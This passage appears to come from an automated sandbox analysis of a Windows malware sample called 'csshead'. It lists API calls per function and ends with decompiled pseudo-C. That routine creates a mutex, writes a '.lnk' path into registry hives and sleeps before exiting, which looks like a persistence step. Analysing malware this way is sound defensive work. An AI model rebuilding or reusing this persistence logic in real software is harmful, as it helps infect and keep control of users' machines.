      • Part of subcall function 00412950: SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 004129F7
      • Part of subcall function 00412950: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19
    • DestroyMenu.USER32(?), ref: 00413C12
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00413C37
    • SendMessageA.USER32(?,00000418,00000000,00000000), ref: 00413C44
    • SendMessageA.USER32(?,00000416,00000000,00000000), ref: 00413C5B
    • GetMenuItemCount.USER32(?), ref: 00413C6C
    • GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00413CDE
    • GetMenuItemInfoA.USER32 ref: 00413D39
    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 00413D44
    • SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 00413D63
    • SendMessageA.USER32(?,00000415,000000FF,?), ref: 00413DB9
    • SendMessageA.USER32(?,00000442,00000000,?), ref: 00413E03
    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00413E19
    • InvalidateRect.USER32(?,00000000,00000001), ref: 00413E22
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00410C90: GetVersionExA.KERNEL32(?,00000000,00000090), ref: 00410CBD
    • SendMessageA.USER32(?,0000041D,?,?), ref: 00418BF9
    • SendMessageA.USER32(?,00000418,00000000,00000000), ref: 00418C0C
    • SendMessageA.USER32(?,0000052E,00000000,00000000), ref: 00418C26
    • CreatePopupMenu.USER32 ref: 00418C34
    • GetClientRect.USER32(?,?), ref: 00418C58
    • SendMessageA.USER32(?,00000417,00000000,?), ref: 00418C88
    • SendMessageA.USER32(?,0000041D,00000000,?), ref: 00418CB3
    • GetMenuItemCount.USER32(?), ref: 00418CE3
    • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00418CFF
    • AppendMenuA.USER32(?,00000000,?,00433984), ref: 00418E6B
      • Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A
    • GetMenuItemInfoA.USER32 ref: 00418D6D
    • AppendMenuA.USER32(?,00000000,00000014,?), ref: 00418D8D
    • SendMessageA.USER32 ref: 00418DFB
    • LoadStringA.USER32(00442B94,?,?,000000C8), ref: 00418E2E
    • GetMenuItemCount.USER32(?), ref: 00418E87
    • DestroyMenu.USER32(?), ref: 00418E96
    • MessageBeep.USER32(000000FF), ref: 00418E9E
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetVersionExA.KERNEL32(?), ref: 00414333
    • SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 00414376
    • GetObjectA.GDI32(?,0000003C,?), ref: 004143AA
    • lstrcmp.KERNEL32(?,?), ref: 00414476
    • CreateFontIndirectA.GDI32(?), ref: 00414488
    • DeleteObject.GDI32(?), ref: 004144A9
    • DeleteObject.GDI32(?), ref: 004144C4
    • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 004144DB
    • SendMessageA.USER32(?,0000041C,00000000,00436330), ref: 004144EC
    • SendMessageA.USER32(?,00000421,00000000,00000000), ref: 004144F9
    • SelectObject.GDI32(00000000,?), ref: 00414519
    • DrawTextA.USER32(00000000,0043632C,000000FF,?,00000424), ref: 00414541
    • SetRectEmpty.USER32(?), ref: 00414559
    • DrawTextA.USER32(00000000,00436328,000000FF,?,00000424), ref: 00414571
    • SelectObject.GDI32(00000000,00000000), ref: 00414593
    • GetVersionExA.KERNEL32(?), ref: 004145C6
    • SystemParametersInfoA.USER32 ref: 004145EE
      • Part of subcall function 004128F0: SendMessageA.USER32(?,00000446,00100000,?), ref: 0041292D
      • Part of subcall function 004128F0: InvalidateRect.USER32(?,00000000,00000001), ref: 0041293B
    • SystemParametersInfoA.USER32(00001022,00000000,?,00000000), ref: 0041465D
    • GetVersionExA.KERNEL32(?), ref: 004146A8
      • Part of subcall function 00410C00: LoadLibraryA.KERNEL32(uxtheme.dll), ref: 00410C2D
      • Part of subcall function 00410C00: GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00410C46
      • Part of subcall function 00410C00: GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00410C58
      • Part of subcall function 00410C00: FreeLibrary.KERNEL32(00000000), ref: 00410C67
      • Part of subcall function 00412950: GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
      • Part of subcall function 00412950: SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 004129F7
      • Part of subcall function 00412950: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042D513
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • GetConsoleMode.KERNEL32(00000000,?,?,00000001,?,U&B,0042DBB3,?,00000108,00000000,0043D088,00000010,00424FBB,U&B,00000000,00000001), ref: 0042D531
    • GetConsoleCP.KERNEL32(?,?,00422655,00000000,?), ref: 0042D551
      • Part of subcall function 0042DE77: __isleadbyte_l.LIBCMT ref: 0042DE81
    • __Stoull.NTSTC_LIBCMT ref: 0042D5EB
    • __Stoull.NTSTC_LIBCMT ref: 0042D60F
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00422655,00000005,00000000,00000000), ref: 0042D641
    • WriteFile.KERNEL32(00000000,00422655,00000000,?,00000000), ref: 0042D66A
    • WriteFile.KERNEL32(00000000,00422655,00000001,?,00000000), ref: 0042D6C3
      • Part of subcall function 00430224: ___initconout.LIBCMT ref: 00430233
      • Part of subcall function 00430224: WriteConsoleW.KERNEL32(004426B0,00000000,00000001,?,00000000,00000000,?,0042D72B,?), ref: 00430256
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042D831
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042D90B
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 0042D9DB
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042DA0C
    • GetLastError.KERNEL32 ref: 0042DA22
    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000001,?,U&B,0042DBB3,?,00000108,00000000,0043D088,00000010,00424FBB), ref: 0042DA63
    • GetLastError.KERNEL32(?,?,00422655,00000000,?), ref: 0042DA82
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
      • Part of subcall function 0042D2B2: SetFilePointer.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0042D4F4,00000000,00000000,00000000,00000002,?,00000001), ref: 0042D2F4
      • Part of subcall function 0042D2B2: GetLastError.KERNEL32(?,0042D4F4,00000000,00000000,00000000,00000002,?,00000001,?,U&B,0042DBB3,?,00000108,00000000,0043D088,00000010), ref: 0042D301
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041EBC5
    • LoadResource.KERNEL32(00442B94,00000000), ref: 0041EBDE
    • LockResource.KERNEL32(00000000), ref: 0041EBE9
    • CreateWindowExA.USER32(00000000,ToolbarWindow32,00000000,?,00000000,00000000,00000064,00000064,?,?,00442B90,00000000), ref: 0041ECD8
    • SendMessageA.USER32(00000000,0000041E,00000014,00000000), ref: 0041ED13
    • SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041ED1A
    • GetStockObject.GDI32(0000000D), ref: 0041ED26
    • GetObjectA.GDI32(?,0000003C,?), ref: 0041ED50
    • FindResourceA.KERNEL32(00442B94,?,00000002), ref: 0041ED77
    • LoadResource.KERNEL32(?,00000000), ref: 0041ED83
    • LockResource.KERNEL32(00000000), ref: 0041ED8A
    • SendMessageA.USER32(00000000,00000413,?,?), ref: 0041EDF5
    • SendMessageA.USER32(00000000,00000414,?,?), ref: 0041EE07
    • SendMessageA.USER32(00000000,00000420,00000000,?), ref: 0041EE2D
    • SendMessageA.USER32(00000000,0000041F,00000000,?), ref: 0041EE5D
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetSysColorBrush.USER32(00000004), ref: 00416150
    • FillRect.USER32(?,?,00000000), ref: 0041615D
    • DrawEdge.USER32(00000006,?,00000006,00000002), ref: 004161A4
    • GetSysColorBrush.USER32(0000001D), ref: 004161B6
    • FillRect.USER32(?,?,00000000), ref: 004161C3
    • GetSysColorBrush.USER32(0000000D), ref: 004161CB
    • FrameRect.USER32(00000000,?,00000000), ref: 004161D8
    • OffsetRect.USER32(?,00000000,?), ref: 00416228
    • InflateRect.USER32(?,000000FF,000000FF), ref: 0041625E
    • GetSysColorBrush.USER32(00000004), ref: 0041626A
    • FillRect.USER32(?,?,00000000), ref: 0041627B
    • GetSysColorBrush.USER32(0000000D), ref: 00416283
    • FrameRect.USER32(00000000,?,00000000), ref: 00416294
    • GetSysColorBrush.USER32(00000004), ref: 00416321
    • GetSysColorBrush.USER32(00000010), ref: 0041632B
      • Part of subcall function 00414710: SelectObject.GDI32(00000000,00000000), ref: 004147C8
      • Part of subcall function 00414710: PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 004147EA
      • Part of subcall function 00414710: GetSysColor.USER32(00000012), ref: 004147F2
      • Part of subcall function 00414710: SelectObject.GDI32(00000000,?), ref: 0041485A
      • Part of subcall function 00414710: DeleteObject.GDI32(00000000), ref: 00414865
      • Part of subcall function 00414710: DeleteDC.GDI32(00000000), ref: 00414872
      • Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A
    • GetMenuItemInfoA.USER32 ref: 00416371
    • SetBkMode.GDI32(?,00000001), ref: 004163E0
    • GetSysColor.USER32(?), ref: 00416404
      • Part of subcall function 00412A20: lstrlen.KERNEL32(?,?,00000000,?,7740E270), ref: 00412A33
      • Part of subcall function 00412A20: SetTextColor.GDI32(00000000,?), ref: 00412A5B
      • Part of subcall function 00412A20: DrawTextA.USER32(00000000,?,00000000,?,?), ref: 00412A81
      • Part of subcall function 00412A20: DrawTextA.USER32(0000002C,00000001,000000FF,?,?), ref: 00412AB1
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SendMessageA.USER32(?,00000229,00000000,?), ref: 00411094
    • SendMessageA.USER32(00000000,0000007F,00000000,00000000), ref: 004110DA
    • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 004110EC
    • GetClassLongA.USER32(00000000,000000DE), ref: 004110FB
    • GetParent.USER32(?), ref: 00411129
    • SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411137
      • Part of subcall function 00410C90: GetVersionExA.KERNEL32(?,00000000,00000090), ref: 00410CBD
    • GetParent.USER32(?), ref: 00411186
    • SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 00411198
    • GetParent.USER32(?), ref: 004111CA
    • SendMessageA.USER32(00000000,00000406,00000000,?), ref: 004111DC
    • GetWindowRect.USER32 ref: 00411219
    • GetParent.USER32(?), ref: 00411223
    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00411233
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00411243
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000001,00000001,00000006), ref: 0041125B
    • SetWindowPos.USER32(?,00000000,00000000,?,00000000,?,00000006), ref: 0041127D
    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00411289
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetParent.USER32(?), ref: 0041257F
    • SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00412595
    • GetVersionExA.KERNEL32(?), ref: 004125DF
    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 0041261A
    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00412633
    • FreeLibrary.KERNEL32(00000000), ref: 0041264E
    • GetParent.USER32(?), ref: 0041269D
    • SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 004126AB
    • SendMessageA.USER32(?,00000418,00000000,00000000), ref: 00412708
    • SendMessageA.USER32(?,0000041D,-00000001,?), ref: 00412730
    • GetParent.USER32(?), ref: 0041273E
    • SendMessageA.USER32(00000000,00000406,00000000,?), ref: 0041274C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00412EFD
    • GetWindowRect.USER32(?,?), ref: 00412F42
    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00412F69
    • FillRect.USER32(00000000,?,00000005), ref: 00412FB0
    • SetRect.USER32(?,?,?,?,?), ref: 00413009
    • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00413035
    • SetRect.USER32(?,?,00000000,?,?), ref: 0041304D
    • GetViewportOrgEx.GDI32(00000000,?), ref: 00413077
    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00413090
    • OffsetRect.USER32(?,?,00000000), ref: 004130A6
    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004130CB
    • OffsetRect.USER32(?,?,00000000), ref: 004130DF
    • FillRect.USER32(00000000,?,00000005), ref: 00413107
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 004113E3
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 00411412
    • DrawFrameControl.USER32(00000000,?,00000001,?), ref: 00413211
    • DrawFrameControl.USER32(00000000,?,00000001,?), ref: 00413234
    • DrawFrameControl.USER32(00000000,?,00000001,-00000001), ref: 00413255
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • MessageBoxA.USER32(?,Error creting instance of DOMDocument,Error,00000040), ref: 0041DCF2
    • VariantClear.OLEAUT32(?), ref: 0041DD67
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
      • Part of subcall function 00432A40: lstrlen.KERNEL32(?,004420A4), ref: 00432A87
      • Part of subcall function 00432A40: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00432A9D
      • Part of subcall function 00432A40: GetLastError.KERNEL32 ref: 00432AAC
      • Part of subcall function 00432A40: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00432B3B
      • Part of subcall function 00432A40: GetLastError.KERNEL32 ref: 00432B56
      • Part of subcall function 00432A40: SysAllocString.OLEAUT32(00000000), ref: 00432B71
      • Part of subcall function 0041DC60: InterlockedDecrement.KERNEL32(?), ref: 0041DC6E
      • Part of subcall function 0041DC60: SysFreeString.OLEAUT32(00000000), ref: 0041DC83
    • VariantClear.OLEAUT32(?), ref: 0041DEBF
    • VariantClear.OLEAUT32(?), ref: 0041DF74
    • VariantClear.OLEAUT32(?), ref: 0041DFEF
    • MessageBoxA.USER32(?,Error saving document.,Error,00000040), ref: 0041E010
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 00415B87
    • RegisterClipboardFormatA.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 00415B9B
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00415BA7
    • SendMessageA.USER32(?,00442B54,?,00000000), ref: 00415BBC
    • GetParent.USER32(?), ref: 00415BC1
    • GetCurrentProcessId.KERNEL32 ref: 00415BCF
    • IsWindow.USER32 ref: 00415BE7
    • SendMessageA.USER32(00000000,0000037F,00000000,?), ref: 00415C00
    • GetCurrentThreadId.KERNEL32 ref: 00415C0D
    • CallNextHookEx.USER32(?,?,?,?), ref: 00415C62
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00415C7C
      • Part of subcall function 00413B70: RtlEnterCriticalSection.NTDLL(00442A20), ref: 00413B84
      • Part of subcall function 00413B70: RegisterClipboardFormatA.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 00413B98
      • Part of subcall function 00413B70: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00413BA4
    Strings
    • WTL_CmdBar_InternalGetBarMsg, xrefs: 00415B96
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetWindowRect.USER32(?,?), ref: 004132D8
      • Part of subcall function 004112B0: SetRect.USER32(?,?,?,?,?), ref: 00411304
      • Part of subcall function 004112B0: SetRect.USER32(00000000,?,?,?,?), ref: 00411320
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 004113E3
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 00411412
    • PtInRect.USER32(?), ref: 00413374
    • GetSystemMenu.USER32(?,00000000), ref: 00413387
      • Part of subcall function 00411910: MonitorFromPoint.USER32(?,?,00000000), ref: 00411928
      • Part of subcall function 00411910: MonitorFromPoint.USER32(?,?,00000002), ref: 00411932
      • Part of subcall function 00411910: GetMonitorInfoA.USER32 ref: 0041196C
    • TrackPopupMenu.USER32(?,?,00000000,?,00000000,?,00000000), ref: 004133DC
    • OffsetRect.USER32(?,?,?), ref: 004133F3
    • PeekMessageA.USER32 ref: 00413435
    • PtInRect.USER32(?,00000000,?), ref: 0041344A
    • PeekMessageA.USER32(?,?,000000A1,000000A1,00000001), ref: 00413469
    • SendMessageA.USER32(?,00000112,00000000,00000000), ref: 00413482
    • PtInRect.USER32(?), ref: 00413491
    • PtInRect.USER32(?), ref: 004134AE
    • PtInRect.USER32(?), ref: 004134CE
    • SetCapture.USER32(?), ref: 00413501
      • Part of subcall function 00412760: DrawFrameControl.USER32(?,?,00000001,?), ref: 00412881
      • Part of subcall function 00412760: DrawFrameControl.USER32(?,?,00000001,?), ref: 004128B5
      • Part of subcall function 00412760: DrawFrameControl.USER32(?,?,00000001,-00000001), ref: 004128E5
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SendMessageA.USER32(?,00000447,00000000,00000000), ref: 00415708
    • SendMessageA.USER32(?,00000448,00000000,00000000), ref: 00415728
      • Part of subcall function 004117C0: GetFocus.USER32 ref: 004117D2
      • Part of subcall function 004117C0: SetFocus.USER32(?), ref: 004117E2
    • GetFocus.USER32 ref: 0041574E
    • IsWindow.USER32(?), ref: 00415761
    • SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 0041577C
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004158D1
      • Part of subcall function 00411530: GetClientRect.USER32(?,?), ref: 00411569
      • Part of subcall function 00411530: GetMenuItemCount.USER32(?), ref: 00411573
      • Part of subcall function 00411530: SendMessageA.USER32(?,00000417,?,?), ref: 004115BD
      • Part of subcall function 00411530: SendMessageA.USER32(?,0000041D,?,?), ref: 004115E0
      • Part of subcall function 00411440: GetClientRect.USER32(?,?), ref: 00411479
      • Part of subcall function 00411440: GetMenuItemCount.USER32(?), ref: 00411498
      • Part of subcall function 00411440: SendMessageA.USER32(?,00000417,?,?), ref: 004114C6
      • Part of subcall function 00411440: SendMessageA.USER32(?,0000041D,?,?), ref: 004114E9
    • PostMessageA.USER32(?,00000100,0000001B,00000000), ref: 0041586B
    • PostMessageA.USER32(00000000,00000100,0000001B,00000000), ref: 00415894
      • Part of subcall function 00411630: GetParent.USER32(?), ref: 00411640
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
      • Part of subcall function 00411630: GetVersionExA.KERNEL32(?), ref: 0041169F
      • Part of subcall function 00411630: LoadLibraryA.KERNEL32(comctl32.dll), ref: 004116D6
      • Part of subcall function 00411630: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004116EF
      • Part of subcall function 00411630: FreeLibrary.KERNEL32(00000000), ref: 0041170A
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
      • Part of subcall function 00411630: PostMessageA.USER32(00000000,0000042B,00000000,00000000), ref: 00411797
      • Part of subcall function 00411630: PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004117AA
    • GetFocus.USER32 ref: 004158E6
    • IsWindow.USER32(?), ref: 004158F5
    • SendMessageA.USER32(?,00000447,00000000,00000000), ref: 0041590C
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 00415933
    • PostMessageA.USER32(?,00000448,000000FF,00000000), ref: 00415961
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414100
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414119
      • Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
      • Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 86%
    			E00408D0C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
    				intOrPtr _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				void* _v28;
    				struct tagPOINT _v36;
    				struct _SECURITY_ATTRIBUTES _v52;
    				char _v309;
    				void* _t60;
    				signed int _t62;
    				signed char _t66;
    				CHAR* _t72;
    				intOrPtr _t128;
    				signed int _t133;
    				signed int _t139;
    				signed char _t164;
    				void* _t166;
    				void* _t171;
    				intOrPtr _t183;
    				void* _t188;
    				void* _t191;
    
    				_t191 = __eflags;
    				_t166 = __ecx;
    				 *0x40b114 = E0040458C(0);
    				E00402574(_t54 | 0xffffffff);
    				 *0x40a064 = E004044F0(_t191);
    				 *0x40a068 = E004042D4(GetCurrentProcess());
    				_t60 = E004044F0(_t191);
    				_t192 = _t60 - 0x3c;
    				if(_t60 >= 0x3c) {
    					_t62 = E004042D4(GetCurrentProcess());
    					__eflags = _t62 - 3;
    					_t2 = _t62 == 3;
    					__eflags = _t2;
    					asm("sbb eax, eax");
    					 *0x40a034 =  ~(_t62 & 0xffffff00 | _t2);
    				} else {
    					_t164 = E004041CC();
    					asm("sbb eax, eax");
    					 *0x40a034 =  ~_t164;
    				}
    				_t66 = E0040453C(GetCurrentProcess());
    				asm("sbb eax, eax");
    				 *0x40a058 =  ~_t66;
    				E004079BC(_t192);
    				_v28 = LocalAlloc(0, 0x14);
    				E00404408( &_v52, _v28);
    				_t72 =  *0x40a0d8; // 0x401cc8
    				 *0x40a054 = CreateMutexA( &_v52, 0, _t72);
    				LocalFree(_v28);
    				_t77 = _a4;
    				asm("sbb eax, eax");
    				_v12 =  ~(_a4 & 0xffffff00 |  *_t77 == 0x0000002b);
    				_t80 = _a4;
    				asm("sbb eax, eax");
    				_v16 =  ~(_a4 & 0xffffff00 |  *((char*)(_t80 + 1)) == 0x0000002b);
    				_a4 = _a4 + 2;
    				E00401B50();
    				E00408BFC();
    				E00407984();
    				E004089D4();
    				E00407A44(_t166);
    				 *0x40b408(0x40be04);
    				 *0x40b514 = E004047AC(_a4, 0x40b510);
    				_v24 = E00407304(0x40b61c);
    				asm("sbb eax, eax");
    				if( ~( ~_v24) == 0) {
    					E0040744C(0x40b61c);
    				}
    				if(_v12 != 0 || _v16 != 0) {
    					E0040471C(_a4, 0x2ee0, 0);
    				}
    				if(_v12 != 0) {
    					E00401308( &_v309, _a4);
    					 *((char*)(_t188 + E004012DC( &_v309) - 0x135)) = 0;
    					E0040133C( &_v309, ".lnk");
    					E0040471C( &_v309, 0, 0);
    					if( *0x40a034 == 0) {
    						E00404A1C(0x80000001,  &_v309);
    					} else {
    						E00404A1C(0x80000002,  &_v309);
    					}
    				}
    				asm("sbb eax, eax");
    				if( ~( ~_v12) == 0) {
    					asm("sbb eax, eax");
    					if( ~( ~_v16) == 0) {
    						_t183 =  *0x40b514; // 0x0
    						E00408CF8(_a4, _t183);
    					}
    				}
    				if(_v12 == 0 || _v24 == 0) {
    					E0040744C(0x40b61c);
    					E00408B98(0x40b518);
    					E00408B6C();
    					E00404BA0(0x40b719);
    					 *0x40b780 = E00405468();
    					 *0x40b651 = E00405468();
    					_v8 = E00403B80(5, 0x19, 0xd);
    					E00401308(0x40b752, _v8);
    					E00401440(_v8);
    					__eflags =  *0x40a034;
    					if( *0x40a034 == 0) {
    						__eflags = 0;
    						_t181 =  *0x40a260; // 0x4021a4
    						E00408064(0x80000001, 0, _t181);
    					} else {
    						_t181 =  *0x40a260; // 0x4021a4
    						E00408064(0x80000002, 0, _t181);
    					}
    					__eflags =  *0x40b621;
    					if( *0x40b621 == 0) {
    						L24:
    						asm("sbb eax, eax");
    						__eflags =  ~( ~_v12);
    						if(__eflags == 0) {
    							_t133 =  *0x40b784; // 0x0
    							__eflags = _t133 &  *0x40a070;
    							if((_t133 &  *0x40a070) != 0) {
    								__eflags =  *0x40b621 - 0x5a;
    								if( *0x40b621 > 0x5a) {
    									GetCursorPos( &_v36);
    								}
    							}
    							_t181 = 0;
    							__eflags = 0;
    							E0040471C(_a4, 0x2ee0, 0);
    						}
    						E00407474(0x40b61c, __eflags);
    						goto L30;
    					} else {
    						_t139 =  *0x40b621; // 0x0
    						_v20 = _t139;
    						__eflags = _v20;
    						if(_v20 == 0) {
    							goto L24;
    						} else {
    							goto L23;
    						}
    						do {
    							L23:
    							Sleep(0x3e8);
    							_v20 = _v20 - 1;
    							__eflags = _v20;
    						} while (_v20 != 0);
    						goto L24;
    					}
    				} else {
    					_t181 = _a4;
    					E00401308(0x40b518, _a4);
    					E00408B6C();
    					L30:
    					E004038DC(0x40be04);
    					 *0x40c380 = 0;
    					E004038EC(0x40be04);
    					_pop(_t171);
    					E00405640(0x40c384, _t171, _t181);
    					_t128 =  *0x40b64d; // 0x0
    					 *0x40c355 = _t128;
    					E00401308(0x40c254, 0x40b625);
    					E004084A4();
    					_push(0);
    					return RtlExitUserThread();
    				}
    			}
    0x00408d0c
    0x00408d0c
    0x00408d1c
    0x00408d24
    0x00408d2e
    0x00408d3e
    0x00408d43
    0x00408d48
    0x00408d4b
    0x00408d63
    0x00408d68
    0x00408d6b
    0x00408d6b
    0x00408d70
    0x00408d72
    0x00408d4d
    0x00408d4d
    0x00408d54
    0x00408d56
    0x00408d56
    0x00408d7d
    0x00408d84
    0x00408d86
    0x00408d8b
    0x00408d9a
    0x00408da3
    0x00408da8
    0x00408dba
    0x00408dc3
    0x00408dc9
    0x00408dd4
    0x00408dd6
    0x00408dd9
    0x00408de5
    0x00408de7
    0x00408dea
    0x00408dee
    0x00408df3
    0x00408df8
    0x00408dfd
    0x00408e02
    0x00408e0c
    0x00408e1f
    0x00408e2e
    0x00408e36
    0x00408e3c
    0x00408e43
    0x00408e43
    0x00408e4c
    0x00408e5e
    0x00408e5e
    0x00408e67
    0x00408e72
    0x00408e82
    0x00408e96
    0x00408ea8
    0x00408eb4
    0x00408ed3
    0x00408eb6
    0x00408ec1
    0x00408ec1
    0x00408eb4
    0x00408edd
    0x00408ee3
    0x00408eea
    0x00408ef0
    0x00408ef2
    0x00408efb
    0x00408efb
    0x00408ef0
    0x00408f04
    0x00408f28
    0x00408f32
    0x00408f37
    0x00408f41
    0x00408f4b
    0x00408f55
    0x00408f65
    0x00408f70
    0x00408f78
    0x00408f7d
    0x00408f84
    0x00408f9a
    0x00408f9c
    0x00408fa7
    0x00408f86
    0x00408f88
    0x00408f93
    0x00408f93
    0x00408fac
    0x00408fb3
    0x00408fd7
    0x00408fdc
    0x00408fe0
    0x00408fe2
    0x00408fe4
    0x00408fef
    0x00408ff1
    0x00408ff3
